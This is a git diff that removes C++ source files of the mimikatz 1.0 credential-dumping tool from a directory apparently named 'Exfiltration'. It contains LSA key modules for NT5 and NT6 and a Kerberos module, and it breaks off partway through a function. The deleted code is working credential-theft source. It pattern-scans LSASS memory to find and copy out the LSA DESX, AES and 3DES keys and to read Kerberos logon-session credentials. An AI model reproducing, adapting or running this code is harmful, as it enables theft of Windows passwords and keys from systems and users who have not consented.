diff options
Diffstat (limited to 'Exfiltration/mimikatz-1.0/mimikatz/modules')
54 files changed, 0 insertions, 6202 deletions
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/LSA Keys/keys_nt5.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/LSA Keys/keys_nt5.cpp deleted file mode 100644 index 9b51c7f..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/LSA Keys/keys_nt5.cpp +++ /dev/null @@ -1,76 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "keys_nt5.h" -#include "..\..\global.h" -PBYTE * mod_mimikatz_sekurlsa_keys_nt5::g_pRandomKey = NULL, * mod_mimikatz_sekurlsa_keys_nt5::g_pDESXKey = NULL; - -#ifdef _M_X64 -BYTE PTRN_WNT5_LsaInitializeProtectedMemory_KEY[] = {0x33, 0xdb, 0x8b, 0xc3, 0x48, 0x83, 0xc4, 0x20, 0x5b, 0xc3}; -LONG OFFS_WNT5_g_pRandomKey = -(6 + 2 + 5 + sizeof(long)); -LONG OFFS_WNT5_g_cbRandomKey = OFFS_WNT5_g_pRandomKey - (3 + sizeof(long)); -LONG OFFS_WNT5_g_pDESXKey = OFFS_WNT5_g_cbRandomKey - (2 + 5 + sizeof(long)); -LONG OFFS_WNT5_g_Feedback = OFFS_WNT5_g_pDESXKey - (3 + 7 + 6 + 2 + 5 + 5 + sizeof(long)); -#elif defined _M_IX86 -BYTE PTRN_WNT5_LsaInitializeProtectedMemory_KEY[] = {0x84, 0xc0, 0x74, 0x44, 0x6a, 0x08, 0x68}; -LONG OFFS_WNT5_g_Feedback = sizeof(PTRN_WNT5_LsaInitializeProtectedMemory_KEY); -LONG OFFS_WNT5_g_pRandomKey = OFFS_WNT5_g_Feedback + sizeof(long) + 5 + 2 + 2 + 2; -LONG OFFS_WNT5_g_pDESXKey = OFFS_WNT5_g_pRandomKey+ sizeof(long) + 2; -LONG OFFS_WNT5_g_cbRandomKey = OFFS_WNT5_g_pDESXKey + sizeof(long) + 5 + 2; -#endif - -bool mod_mimikatz_sekurlsa_keys_nt5::searchAndInitLSASSData() -{ - PBYTE ptrBase = NULL; - DWORD mesSucces = 0; - if(mod_memory::searchMemory(mod_mimikatz_sekurlsa::localLSASRV.modBaseAddr, mod_mimikatz_sekurlsa::localLSASRV.modBaseAddr + mod_mimikatz_sekurlsa::localLSASRV.modBaseSize, PTRN_WNT5_LsaInitializeProtectedMemory_KEY, &ptrBase, sizeof(PTRN_WNT5_LsaInitializeProtectedMemory_KEY))) - { -#ifdef _M_X64 - PBYTE g_Feedback = reinterpret_cast<PBYTE >((ptrBase + OFFS_WNT5_g_Feedback) + sizeof(long) + *reinterpret_cast<long *>(ptrBase + OFFS_WNT5_g_Feedback)); - g_pRandomKey = reinterpret_cast<PBYTE *>((ptrBase + OFFS_WNT5_g_pRandomKey) + sizeof(long) + *reinterpret_cast<long *>(ptrBase + OFFS_WNT5_g_pRandomKey)); - g_pDESXKey = reinterpret_cast<PBYTE *>((ptrBase + OFFS_WNT5_g_pDESXKey) + sizeof(long) + *reinterpret_cast<long *>(ptrBase + OFFS_WNT5_g_pDESXKey)); - PDWORD g_cbRandomKey = reinterpret_cast<PDWORD >((ptrBase + OFFS_WNT5_g_cbRandomKey) + sizeof(long) + *reinterpret_cast<long *>(ptrBase + OFFS_WNT5_g_cbRandomKey)); -#elif defined _M_IX86 - PBYTE g_Feedback = *reinterpret_cast<PBYTE *>(ptrBase + OFFS_WNT5_g_Feedback); - g_pRandomKey = *reinterpret_cast<PBYTE **>(ptrBase + OFFS_WNT5_g_pRandomKey); - g_pDESXKey = *reinterpret_cast<PBYTE **>(ptrBase + OFFS_WNT5_g_pDESXKey); - PDWORD g_cbRandomKey = *reinterpret_cast<PDWORD *>(ptrBase + OFFS_WNT5_g_cbRandomKey); -#endif - *g_Feedback = NULL; *g_pRandomKey = NULL; *g_pDESXKey = NULL; *g_cbRandomKey = NULL; - - mesSucces = 0; - if(mod_memory::readMemory(mod_mimikatz_sekurlsa::pModLSASRV->modBaseAddr + (g_Feedback - mod_mimikatz_sekurlsa::localLSASRV.modBaseAddr), g_Feedback, 8, mod_mimikatz_sekurlsa::hLSASS)) - mesSucces++; - if(mod_memory::readMemory(mod_mimikatz_sekurlsa::pModLSASRV->modBaseAddr + (reinterpret_cast<PBYTE>(g_cbRandomKey) - mod_mimikatz_sekurlsa::localLSASRV.modBaseAddr), g_cbRandomKey, sizeof(DWORD), mod_mimikatz_sekurlsa::hLSASS)) - mesSucces++; - if(mod_memory::readMemory(mod_mimikatz_sekurlsa::pModLSASRV->modBaseAddr + (reinterpret_cast<PBYTE>(g_pRandomKey) - mod_mimikatz_sekurlsa::localLSASRV.modBaseAddr), &ptrBase, sizeof(PBYTE), mod_mimikatz_sekurlsa::hLSASS)) - { - mesSucces++; - *g_pRandomKey = new BYTE[*g_cbRandomKey]; - if(mod_memory::readMemory(ptrBase, *g_pRandomKey, *g_cbRandomKey, mod_mimikatz_sekurlsa::hLSASS)) - mesSucces++; - } - if(mod_memory::readMemory(mod_mimikatz_sekurlsa::pModLSASRV->modBaseAddr + (reinterpret_cast<PBYTE>(g_pDESXKey) - mod_mimikatz_sekurlsa::localLSASRV.modBaseAddr), &ptrBase, sizeof(PBYTE), mod_mimikatz_sekurlsa::hLSASS)) - { - mesSucces++; - *g_pDESXKey = new BYTE[144]; - if(mod_memory::readMemory(ptrBase, *g_pDESXKey, 144, mod_mimikatz_sekurlsa::hLSASS)) - mesSucces++; - } - } - else (*outputStream) << L"mod_memory::searchMemory NT5 " << mod_system::getWinError() << endl; - return (mesSucces == 6); -} - -bool mod_mimikatz_sekurlsa_keys_nt5::uninitLSASSData() -{ - if(g_pRandomKey && *g_pRandomKey) - delete[] *g_pRandomKey; - if(g_pDESXKey && *g_pDESXKey) - delete[] *g_pDESXKey; - - return true; -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/LSA Keys/keys_nt5.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/LSA Keys/keys_nt5.h deleted file mode 100644 index 121d9c5..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/LSA Keys/keys_nt5.h +++ /dev/null @@ -1,17 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../mod_mimikatz_sekurlsa.h" - -class mod_mimikatz_sekurlsa_keys_nt5 { - -private: - static PBYTE *g_pRandomKey, *g_pDESXKey; -public: - static bool searchAndInitLSASSData(); - static bool uninitLSASSData(); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/LSA Keys/keys_nt6.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/LSA Keys/keys_nt6.cpp deleted file mode 100644 index ac642ef..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/LSA Keys/keys_nt6.cpp +++ /dev/null @@ -1,186 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` -http://blog.gentilkiwi.com -benjamin@gentilkiwi.com -Licence : http://creativecommons.org/licenses/by/3.0/fr/ -Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "keys_nt6.h" -#include "..\..\global.h" -HMODULE mod_mimikatz_sekurlsa_keys_nt6::hBCrypt = NULL; -PBYTE mod_mimikatz_sekurlsa_keys_nt6::AESKey = NULL, mod_mimikatz_sekurlsa_keys_nt6::DES3Key = NULL; -mod_mimikatz_sekurlsa_keys_nt6::PKIWI_BCRYPT_KEY * mod_mimikatz_sekurlsa_keys_nt6::hAesKey = NULL, * mod_mimikatz_sekurlsa_keys_nt6::h3DesKey = NULL; -BCRYPT_ALG_HANDLE * mod_mimikatz_sekurlsa_keys_nt6::hAesProvider = NULL, * mod_mimikatz_sekurlsa_keys_nt6::h3DesProvider = NULL; - -BYTE kiwiRandom3DES[24], kiwiRandomAES[16]; - -#ifdef _M_X64 -BYTE PTRN_WNO8_LsaInitializeProtectedMemory_KEY[] = {0x83, 0x64, 0x24, 0x30, 0x00, 0x44, 0x8B, 0x4C, 0x24, 0x48, 0x48, 0x8B, 0x0D}; -LONG OFFS_WNO8_hAesKey = sizeof(PTRN_WNO8_LsaInitializeProtectedMemory_KEY) + sizeof(LONG) + 5 + 3; -LONG OFFS_WN61_h3DesKey = - (2 + 2 + 2 + 5 + 3 + 4 + 2 + 5 + 5 + 2 + 2 + 2 + 5 + 5 + 8 + 3 + sizeof(long)); -LONG OFFS_WN61_InitializationVector = OFFS_WNO8_hAesKey + sizeof(long) + 3 + 4 + 5 + 5 + 2 + 2 + 2 + 4 + 3; -LONG OFFS_WN60_h3DesKey = - (6 + 2 + 2 + 5 + 3 + 4 + 2 + 5 + 5 + 6 + 2 + 2 + 5 + 5 + 8 + 3 + sizeof(long)); -LONG OFFS_WN60_InitializationVector = OFFS_WNO8_hAesKey + sizeof(long) + 3 + 4 + 5 + 5 + 2 + 2 + 6 + 4 + 3; - -BYTE PTRN_WIN8_LsaInitializeProtectedMemory_KEY[] = {0x83, 0x64, 0x24, 0x30, 0x00, 0x44, 0x8B, 0x4D, 0xD8, 0x48, 0x8B, 0x0D}; -LONG OFFS_WIN8_hAesKey = sizeof(PTRN_WIN8_LsaInitializeProtectedMemory_KEY) + sizeof(LONG) + 4 + 3; -LONG OFFS_WIN8_h3DesKey = - (6 + 2 + 2 + 6 + 3 + 4 + 2 + 4 + 5 + 6 + 2 + 2 + 6 + 5 + 8 + 3 + sizeof(long)); -LONG OFFS_WIN8_InitializationVector = OFFS_WIN8_hAesKey + sizeof(long) + 3 + 4 + 5 + 6 + 2 + 2 + 6 + 4 + 3; -#elif defined _M_IX86 -BYTE PTRN_WNO8_LsaInitializeProtectedMemory_KEY[] = {0x8B, 0xF0, 0x3B, 0xF3, 0x7C, 0x2C, 0x6A, 0x02, 0x6A, 0x10, 0x68}; -LONG OFFS_WNO8_hAesKey = -(5 + 6 + sizeof(long)); -LONG OFFS_WNO8_h3DesKey = OFFS_WNO8_hAesKey - (1 + 3 + 3 + 1 + 3 + 2 + 1 + 2 + 2 + 2 + 5 + 1 + 1 + 3 + 2 + 2 + 2 + 2 + 2 + 5 + 6 + sizeof(long)); -LONG OFFS_WNO8_InitializationVector = sizeof(PTRN_WNO8_LsaInitializeProtectedMemory_KEY); - -BYTE PTRN_WIN8_LsaInitializeProtectedMemory_KEY[] = {0x8B, 0xF0, 0x85, 0xF6, 0x78, 0x2A, 0x6A, 0x02, 0x6A, 0x10, 0x68}; -LONG OFFS_WIN8_hAesKey = -(2 + 6 + sizeof(long)); -LONG OFFS_WIN8_h3DesKey = OFFS_WIN8_hAesKey - (1 + 3 + 3 + 1 + 3 + 2 + 2 + 2 + 2 + 2 + 2 + 2 + 1 + 3 + 2 + 2 + 2 + 2 + 2 + 2 + 6 + sizeof(long)); -LONG OFFS_WIN8_InitializationVector = sizeof(PTRN_WIN8_LsaInitializeProtectedMemory_KEY); -#endif - -bool mod_mimikatz_sekurlsa_keys_nt6::searchAndInitLSASSData() -{ - if(!hBCrypt) - hBCrypt = LoadLibrary(L"bcrypt"); - - PBYTE PTRN_WNT6_LsaInitializeProtectedMemory_KEY; - ULONG SIZE_PTRN_WNT6_LsaInitializeProtectedMemory_KEY; - LONG OFFS_WNT6_hAesKey, OFFS_WNT6_h3DesKey, OFFS_WNT6_InitializationVector; - if(mod_system::GLOB_Version.dwBuildNumber < 8000) - { - PTRN_WNT6_LsaInitializeProtectedMemory_KEY = PTRN_WNO8_LsaInitializeProtectedMemory_KEY; - SIZE_PTRN_WNT6_LsaInitializeProtectedMemory_KEY = sizeof(PTRN_WNO8_LsaInitializeProtectedMemory_KEY); - OFFS_WNT6_hAesKey = OFFS_WNO8_hAesKey; -#ifdef _M_X64 - if(mod_system::GLOB_Version.dwMinorVersion < 1) - { - OFFS_WNT6_h3DesKey = OFFS_WN60_h3DesKey; - OFFS_WNT6_InitializationVector = OFFS_WN60_InitializationVector; - } - else - { - OFFS_WNT6_h3DesKey = OFFS_WN61_h3DesKey; - OFFS_WNT6_InitializationVector = OFFS_WN61_InitializationVector; - } -#elif defined _M_IX86 - OFFS_WNT6_h3DesKey = OFFS_WNO8_h3DesKey; - OFFS_WNT6_InitializationVector = OFFS_WNO8_InitializationVector; -#endif - } - else - { - PTRN_WNT6_LsaInitializeProtectedMemory_KEY = PTRN_WIN8_LsaInitializeProtectedMemory_KEY; - SIZE_PTRN_WNT6_LsaInitializeProtectedMemory_KEY = sizeof(PTRN_WIN8_LsaInitializeProtectedMemory_KEY); - OFFS_WNT6_hAesKey = OFFS_WIN8_hAesKey; - OFFS_WNT6_h3DesKey = OFFS_WIN8_h3DesKey; - OFFS_WNT6_InitializationVector = OFFS_WIN8_InitializationVector; - } - - PBYTE ptrBase = NULL; - DWORD mesSucces = 0; - if(mod_memory::searchMemory(mod_mimikatz_sekurlsa::localLSASRV.modBaseAddr, mod_mimikatz_sekurlsa::localLSASRV.modBaseAddr + mod_mimikatz_sekurlsa::localLSASRV.modBaseSize, PTRN_WNT6_LsaInitializeProtectedMemory_KEY, &ptrBase, SIZE_PTRN_WNT6_LsaInitializeProtectedMemory_KEY)) - { -#ifdef _M_X64 - LONG OFFS_WNT6_AdjustProvider = (mod_system::GLOB_Version.dwBuildNumber < 8000) ? 5 : 4; - PBYTE InitializationVector = reinterpret_cast<PBYTE >((ptrBase + OFFS_WNT6_InitializationVector) + sizeof(long) + *reinterpret_cast<long *>(ptrBase + OFFS_WNT6_InitializationVector)); - hAesKey = reinterpret_cast<PKIWI_BCRYPT_KEY *>((ptrBase + OFFS_WNT6_hAesKey) + sizeof(long) + *reinterpret_cast<long *>(ptrBase + OFFS_WNT6_hAesKey)); - h3DesKey = reinterpret_cast<PKIWI_BCRYPT_KEY *>((ptrBase + OFFS_WNT6_h3DesKey) + sizeof(long) + *reinterpret_cast<long *>(ptrBase + OFFS_WNT6_h3DesKey)); - hAesProvider = reinterpret_cast<BCRYPT_ALG_HANDLE *>((ptrBase + OFFS_WNT6_hAesKey - 3 - OFFS_WNT6_AdjustProvider -sizeof(long)) + sizeof(long) + *reinterpret_cast<long *>(ptrBase + OFFS_WNT6_hAesKey - 3 - OFFS_WNT6_AdjustProvider -sizeof(long))); - h3DesProvider = reinterpret_cast<BCRYPT_ALG_HANDLE *>((ptrBase + OFFS_WNT6_h3DesKey - 3 - OFFS_WNT6_AdjustProvider -sizeof(long)) + sizeof(long) + *reinterpret_cast<long *>(ptrBase + OFFS_WNT6_h3DesKey - 3 - OFFS_WNT6_AdjustProvider -sizeof(long))); -#elif defined _M_IX86 - PBYTE InitializationVector = *reinterpret_cast<PBYTE * >(ptrBase + OFFS_WNT6_InitializationVector); - hAesKey = *reinterpret_cast<PKIWI_BCRYPT_KEY **>(ptrBase + OFFS_WNT6_hAesKey); - h3DesKey = *reinterpret_cast<PKIWI_BCRYPT_KEY **>(ptrBase + OFFS_WNT6_h3DesKey); - hAesProvider = *reinterpret_cast<BCRYPT_ALG_HANDLE **>(ptrBase + OFFS_WNT6_hAesKey + sizeof(PVOID) + 2); - h3DesProvider = *reinterpret_cast<BCRYPT_ALG_HANDLE **>(ptrBase + OFFS_WNT6_h3DesKey + sizeof(PVOID) + 2); -#endif - if(hBCrypt && LsaInitializeProtectedMemory()) - { - if(mod_memory::readMemory(mod_mimikatz_sekurlsa::pModLSASRV->modBaseAddr + (InitializationVector - mod_mimikatz_sekurlsa::localLSASRV.modBaseAddr), InitializationVector, 16, mod_mimikatz_sekurlsa::hLSASS)) - mesSucces++; - - KIWI_BCRYPT_KEY maCle; - KIWI_BCRYPT_KEY_DATA maCleData; - - if(mod_memory::readMemory(mod_mimikatz_sekurlsa::pModLSASRV->modBaseAddr + (reinterpret_cast<PBYTE>(hAesKey) - mod_mimikatz_sekurlsa::localLSASRV.modBaseAddr), &ptrBase, sizeof(PBYTE), mod_mimikatz_sekurlsa::hLSASS)) - if(mod_memory::readMemory(ptrBase, &maCle, sizeof(KIWI_BCRYPT_KEY), mod_mimikatz_sekurlsa::hLSASS)) - if(mod_memory::readMemory(maCle.cle, &maCleData, sizeof(KIWI_BCRYPT_KEY_DATA), mod_mimikatz_sekurlsa::hLSASS)) - if(mod_memory::readMemory(reinterpret_cast<PBYTE>(maCle.cle) + FIELD_OFFSET(KIWI_BCRYPT_KEY_DATA, data), &(*hAesKey)->cle->data, maCleData.size - FIELD_OFFSET(KIWI_BCRYPT_KEY_DATA, data) - 2*sizeof(PVOID), mod_mimikatz_sekurlsa::hLSASS)) // 2 pointeurs internes à la fin, la structure de départ n'était pas inutile ;) - mesSucces++; - - if(mod_memory::readMemory(mod_mimikatz_sekurlsa::pModLSASRV->modBaseAddr + (reinterpret_cast<PBYTE>(h3DesKey) - mod_mimikatz_sekurlsa::localLSASRV.modBaseAddr), &ptrBase, sizeof(PBYTE), mod_mimikatz_sekurlsa::hLSASS)) - if(mod_memory::readMemory(ptrBase, &maCle, sizeof(KIWI_BCRYPT_KEY), mod_mimikatz_sekurlsa::hLSASS)) - if(mod_memory::readMemory(maCle.cle, &maCleData, sizeof(KIWI_BCRYPT_KEY_DATA), mod_mimikatz_sekurlsa::hLSASS)) - if(mod_memory::readMemory(reinterpret_cast<PBYTE>(maCle.cle) + FIELD_OFFSET(KIWI_BCRYPT_KEY_DATA, data), &(*h3DesKey)->cle->data, maCleData.size - FIELD_OFFSET(KIWI_BCRYPT_KEY_DATA, data), mod_mimikatz_sekurlsa::hLSASS)) - mesSucces++; - } - else (*outputStream) << L"LsaInitializeProtectedMemory NT6 KO" << endl; - } - else (*outputStream) << L"mod_memory::searchMemory NT6 " << mod_system::getWinError() << endl; - - return (mesSucces == 3); -} - - -bool mod_mimikatz_sekurlsa_keys_nt6::uninitLSASSData() -{ - if(hBCrypt) - { - LsaCleanupProtectedMemory(); - FreeLibrary(hBCrypt); - } - return true; -} - -bool mod_mimikatz_sekurlsa_keys_nt6::LsaInitializeProtectedMemory() -{ - bool resultat = false; - - PBCRYPT_OPEN_ALGORITHM_PROVIDER K_BCryptOpenAlgorithmProvider = reinterpret_cast<PBCRYPT_OPEN_ALGORITHM_PROVIDER>(GetProcAddress(hBCrypt, "BCryptOpenAlgorithmProvider")); - PBCRYPT_SET_PROPERTY K_BCryptSetProperty = reinterpret_cast<PBCRYPT_SET_PROPERTY>(GetProcAddress(hBCrypt, "BCryptSetProperty")); - PBCRYPT_GET_PROPERTY K_BCryptGetProperty = reinterpret_cast<PBCRYPT_GET_PROPERTY>(GetProcAddress(hBCrypt, "BCryptGetProperty")); - PBCRYPT_GENERATE_SYMMETRIC_KEY K_BCryptGenerateSymmetricKey = reinterpret_cast<PBCRYPT_GENERATE_SYMMETRIC_KEY>(GetProcAddress(hBCrypt, "BCryptGenerateSymmetricKey")); - - if(NT_SUCCESS(K_BCryptOpenAlgorithmProvider(h3DesProvider, BCRYPT_3DES_ALGORITHM, NULL, 0)) && - NT_SUCCESS(K_BCryptOpenAlgorithmProvider(hAesProvider, BCRYPT_AES_ALGORITHM, NULL, 0))) - { - if(NT_SUCCESS(K_BCryptSetProperty(*h3DesProvider, BCRYPT_CHAINING_MODE, reinterpret_cast<PBYTE>(BCRYPT_CHAIN_MODE_CBC), sizeof(BCRYPT_CHAIN_MODE_CBC), 0)) && - NT_SUCCESS(K_BCryptSetProperty(*hAesProvider, BCRYPT_CHAINING_MODE, reinterpret_cast<PBYTE>(BCRYPT_CHAIN_MODE_CFB), sizeof(BCRYPT_CHAIN_MODE_CFB), 0))) - { - DWORD DES3KeyLen, AESKeyLen, cbLen; - - if(NT_SUCCESS(K_BCryptGetProperty(*h3DesProvider, BCRYPT_OBJECT_LENGTH, reinterpret_cast<PBYTE>(&DES3KeyLen), sizeof(DES3KeyLen), &cbLen, 0)) && - NT_SUCCESS(K_BCryptGetProperty(*hAesProvider, BCRYPT_OBJECT_LENGTH, reinterpret_cast<PBYTE>(&AESKeyLen), sizeof(AESKeyLen), &cbLen, 0))) - { - DES3Key = new BYTE[DES3KeyLen]; - AESKey = new BYTE[AESKeyLen]; - - resultat = NT_SUCCESS(K_BCryptGenerateSymmetricKey(*h3DesProvider, (BCRYPT_KEY_HANDLE *) h3DesKey, DES3Key, DES3KeyLen, kiwiRandom3DES, sizeof(kiwiRandom3DES), 0)) && - NT_SUCCESS(K_BCryptGenerateSymmetricKey(*hAesProvider, (BCRYPT_KEY_HANDLE *) hAesKey, AESKey, AESKeyLen, kiwiRandomAES, sizeof(kiwiRandomAES), 0)); - } - } - } - return resultat; -} - -bool mod_mimikatz_sekurlsa_keys_nt6::LsaCleanupProtectedMemory() -{ - PBCRYTP_DESTROY_KEY K_BCryptDestroyKey = reinterpret_cast<PBCRYTP_DESTROY_KEY>(GetProcAddress(hBCrypt, "BCryptDestroyKey")); - PBCRYTP_CLOSE_ALGORITHM_PROVIDER K_BCryptCloseAlgorithmProvider = reinterpret_cast<PBCRYTP_CLOSE_ALGORITHM_PROVIDER>(GetProcAddress(hBCrypt, "BCryptCloseAlgorithmProvider")); - - if (h3DesKey ) - K_BCryptDestroyKey(*h3DesKey); - if (hAesKey ) - K_BCryptDestroyKey(*hAesKey); - - if (h3DesProvider) - K_BCryptCloseAlgorithmProvider(*h3DesProvider, 0); - if (hAesProvider ) - K_BCryptCloseAlgorithmProvider(*hAesProvider, 0); - - if(DES3Key) - delete[] DES3Key; - if(AESKey) - delete[] AESKey; - - return true; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/LSA Keys/keys_nt6.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/LSA Keys/keys_nt6.h deleted file mode 100644 index 9b1940a..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/LSA Keys/keys_nt6.h +++ /dev/null @@ -1,45 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../mod_mimikatz_sekurlsa.h" - -class mod_mimikatz_sekurlsa_keys_nt6 { - -private: - static HMODULE hBCrypt; - - typedef struct _KIWI_BCRYPT_KEY_DATA { - DWORD size; - DWORD tag; - DWORD type; - DWORD unk0; - DWORD unk1; - DWORD unk2; - DWORD unk3; - PVOID unk4; - BYTE data; /* etc... */ - } KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA; - - typedef struct _KIWI_BCRYPT_KEY { - DWORD size; - DWORD type; - PVOID unk0; - PKIWI_BCRYPT_KEY_DATA cle; - PVOID unk1; - } KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY; - - static PBYTE DES3Key, AESKey; - static PKIWI_BCRYPT_KEY * hAesKey, * h3DesKey; - static BCRYPT_ALG_HANDLE * hAesProvider, * h3DesProvider; - - static bool LsaInitializeProtectedMemory(); - static bool LsaCleanupProtectedMemory(); - -public: - static bool searchAndInitLSASSData(); - static bool uninitLSASSData(); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.cpp deleted file mode 100644 index dae52d2..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.cpp +++ /dev/null @@ -1,135 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "kerberos.h" -#include "..\..\global.h" -mod_process::PKIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa_kerberos::pModKERBEROS = NULL; -mod_mimikatz_sekurlsa_kerberos::PKIWI_KERBEROS_LOGON_SESSION mod_mimikatz_sekurlsa_kerberos::KerbLogonSessionList = NULL; //reinterpret_cast<mod_mimikatz_sekurlsa_kerberos::PKIWI_KERBEROS_LOGON_SESSION>(NULL); -long mod_mimikatz_sekurlsa_kerberos::offsetMagic = 0; -PRTL_AVL_TABLE mod_mimikatz_sekurlsa_kerberos::KerbGlobalLogonSessionTable = NULL; //reinterpret_cast<PRTL_AVL_TABLE>(NULL); - -bool mod_mimikatz_sekurlsa_kerberos::getKerberos(vector<wstring> * arguments) -{ - vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider; - monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getKerberosLogonData, wstring(L"kerberos"))); - return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider); -} - -bool mod_mimikatz_sekurlsa_kerberos::searchKerberosFuncs() -{ -#ifdef _M_X64 - BYTE PTRN_WALL_KerbUnloadLogonSessionTable[]= {0x48, 0x8b, 0x18, 0x48, 0x8d, 0x0d}; - LONG OFFS_WALL_KerbUnloadLogonSessionTable = sizeof(PTRN_WALL_KerbUnloadLogonSessionTable); - - BYTE PTRN_WALL_KerbFreeLogonSessionList[] = {0x48, 0x3b, 0xfe, 0x0f, 0x84}; - LONG OFFS_WALL_KerbFreeLogonSessionList = -4; -#elif defined _M_IX86 - BYTE PTRN_WNO8_KerbUnloadLogonSessionTable[]= {0x85, 0xc0, 0x74, 0x1f, 0x53}; - LONG OFFS_WNO8_KerbUnloadLogonSessionTable = -(3 + 4); - BYTE PTRN_WIN8_KerbUnloadLogonSessionTable[]= {0x85, 0xc0, 0x74, 0x2b, 0x57}; // 2c au lieu de 2b pour avant le RC - LONG OFFS_WIN8_KerbUnloadLogonSessionTable = -(6 + 4); - - BYTE PTRN_WALL_KerbFreeLogonSessionList[] = {0xeb, 0x0f, 0x6a, 0x01, 0x57, 0x56, 0xe8}; - LONG OFFS_WALL_KerbFreeLogonSessionList = -4; -#endif - if(mod_mimikatz_sekurlsa::searchLSASSDatas() && pModKERBEROS && !(KerbGlobalLogonSessionTable || KerbLogonSessionList)) - { - PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0; - - if(mod_system::GLOB_Version.dwMajorVersion < 6) - { - pointeur= reinterpret_cast<PBYTE *>(&KerbLogonSessionList); - pattern = PTRN_WALL_KerbFreeLogonSessionList; - taille = sizeof(PTRN_WALL_KerbFreeLogonSessionList); - offset = OFFS_WALL_KerbFreeLogonSessionList; - - if(mod_system::GLOB_Version.dwMinorVersion < 2) - offsetMagic = 8; - } - else - { - pointeur= reinterpret_cast<PBYTE *>(&KerbGlobalLogonSessionTable); - -#ifdef _M_X64 - pattern = PTRN_WALL_KerbUnloadLogonSessionTable; - taille = sizeof(PTRN_WALL_KerbUnloadLogonSessionTable); - offset = OFFS_WALL_KerbUnloadLogonSessionTable; -#elif defined _M_IX86 - if(mod_system::GLOB_Version.dwBuildNumber < 8000) - { - pattern = PTRN_WNO8_KerbUnloadLogonSessionTable; - taille = sizeof(PTRN_WNO8_KerbUnloadLogonSessionTable); - offset = OFFS_WNO8_KerbUnloadLogonSessionTable; - } - else - { - if(mod_system::GLOB_Version.dwBuildNumber < 8400) // petite correction pour avant la RC - PTRN_WIN8_KerbUnloadLogonSessionTable[3] = 0x2c; - pattern = PTRN_WIN8_KerbUnloadLogonSessionTable; - taille = sizeof(PTRN_WIN8_KerbUnloadLogonSessionTable); - offset = OFFS_WIN8_KerbUnloadLogonSessionTable; - } -#endif - } - - if(HMODULE monModule = LoadLibrary(L"kerberos")) - { - MODULEINFO mesInfos; - if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO))) - { - mod_memory::genericPatternSearch(pointeur, L"kerberos", pattern, taille, offset); - *pointeur += pModKERBEROS->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll); - } - FreeLibrary(monModule); - } - } - return (pModKERBEROS && (KerbGlobalLogonSessionTable || KerbLogonSessionList)); -} - -bool WINAPI mod_mimikatz_sekurlsa_kerberos::getKerberosLogonData(__in PLUID logId, __in bool justSecurity) -{ - if(searchKerberosFuncs()) - { - PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL; - DWORD taille; - BYTE * monBuff = NULL; - - if(KerbGlobalLogonSessionTable) - { - taille = sizeof(KIWI_KERBEROS_PRIMARY_CREDENTIAL); - monBuff = new BYTE[taille]; - - if(PKIWI_KERBEROS_PRIMARY_CREDENTIAL pLogSession = reinterpret_cast<PKIWI_KERBEROS_PRIMARY_CREDENTIAL>(mod_mimikatz_sekurlsa::getPtrFromAVLByLuid(KerbGlobalLogonSessionTable, FIELD_OFFSET(KIWI_KERBEROS_PRIMARY_CREDENTIAL, LocallyUniqueIdentifier), logId))) - { - if(mod_memory::readMemory(pLogSession, monBuff, taille, mod_mimikatz_sekurlsa::hLSASS)) - { - pLogSession = reinterpret_cast<PKIWI_KERBEROS_PRIMARY_CREDENTIAL>(monBuff); - mesCreds = &pLogSession->credentials; - } - } - } - else - { - taille = sizeof(KIWI_KERBEROS_LOGON_SESSION) + offsetMagic; - monBuff = new BYTE[taille]; - if(PKIWI_KERBEROS_LOGON_SESSION pLogSession = reinterpret_cast<PKIWI_KERBEROS_LOGON_SESSION>(mod_mimikatz_sekurlsa::getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(KerbLogonSessionList), 